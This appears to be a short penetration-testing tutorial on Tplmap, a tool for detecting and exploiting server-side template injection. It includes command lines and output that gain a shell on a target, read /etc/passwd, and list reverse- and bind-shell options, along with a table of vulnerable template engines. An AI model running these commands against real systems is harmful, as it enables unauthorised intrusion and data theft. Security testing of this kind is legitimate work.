When you run a penetration test of a web page that generates dynamic content using templates with user-provided values, you may encounter server-side template injection vulnerability. Manual identification of the template engine you are dealing with and subsequent exploitation can be easily automated using the Tplmap tool.
Tplmap is able to detect and use SSTI in several types of template engines. It has such functionalities as browsing the file system and remotely executing commands on the attacked server.
$ ./tplmap.py -u 'http://www.target.com/page?name=John'
[+] Tplmap 0.5
Automatic Server-Side Template Injection Detection and Exploitation Tool
[+] Testing if GET parameter 'name' is injectable
[+] Smarty plugin is testing rendering with tag '{*}'
[+] Smarty plugin is testing blind injection
[+] Mako plugin is testing rendering with tag '${*}'
...
[+] Jinja2 plugin is testing rendering with tag '{{*}}'
[+] Jinja2 plugin has confirmed injection with tag '{{*}}'
[+] Tplmap identified the following injection point:
GET parameter: name
Engine: Jinja2
Injection: {{*}}
Context: text
OS: linux
Technique: render
Capabilities:
Shell command execution: approx.
Bind and reverse shell: approx.
File write: ok
File read: ok
Code evaluation: ok, python code
[+] Rerun tplmap providing one of the following options:
--os-shell Run shell on the target
--os-cmd Execute shell commands
--bind-shell PORT Connect to a shell bind to a target port
--reverse-shell HOST PORT Send a shell back to the attacker's port
--upload LOCAL REMOTE Upload files to the server
--download REMOTE LOCAL Download remote files
Use the --os-shell option to run the pseudoterminal on the target.
$ ./tplmap.py --os-shell -u 'http://www.target.com/page?name=John'
[+] Tplmap 0.5
Automatic Server-Side Template Injection Detection and Exploitation Tool
[+] Run commands on the operating system.
linux $ whoami
Web
linux $ cat /etc/passwd
root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
Tplmap supports more than 15 template engines:
| Engine | Remote command execution | Blind | Code evaluation | Read file | Write to file |
|---|---|---|---|---|---|
| Mako | ✓ | ✓ | Python | ✓ | ✓ |
| Jinja2 | ✓ | ✓ | Python | ✓ | ✓ |
| Python (code eval) | ✓ | ✓ | Python | ✓ | ✓ |
| tornado | ✓ | ✓ | Python | ✓ | ✓ |
| Nunjucks, Kentucky | ✓ | ✓ | Javascript | ✓ | ✓ |
| Pug | ✓ | ✓ | Javascript | ✓ | ✓ |
| Dot | ✓ | ✓ | Javascript | ✓ | ✓ |
| Marko | ✓ | ✓ | Javascript | ✓ | ✓ |
| JavaScript (code eval) | ✓ | ✓ | Javascript | ✓ | ✓ |
| Dust (<= [email protected]) | ✓ | ✓ | Javascript | ✓ | ✓ |
| EJS | ✓ | ✓ | Javascript | ✓ | ✓ |
| Ruby (code eval) | ✓ | ✓ | Ruby | ✓ | ✓ |
| Slim | ✓ | ✓ | Ruby | ✓ | ✓ |
| erbium | ✓ | ✓ | Ruby | ✓ | ✓ |
| Smarty (unsecured) | ✓ | ✓ | PHP | ✓ | ✓ |
| PHP (code eval) | ✓ | ✓ | PHP | ✓ | ✓ |
| Twig (<=1.19) | ✓ | ✓ | PHP | ✓ | ✓ |
| Freemarker | ✓ | ✓ | × | ✓ | ✓ |
| Velocity, New | ✓ | ✓ | × | ✓ | ✓ |
| Twig (>1.19) | × | × | × | × | × |
| Smarty (secured) | × | × | × | × | × |
| Dust (> [email protected]) | × | × | × | × | × |
Tplmap can be found on the creator github – tplmap.
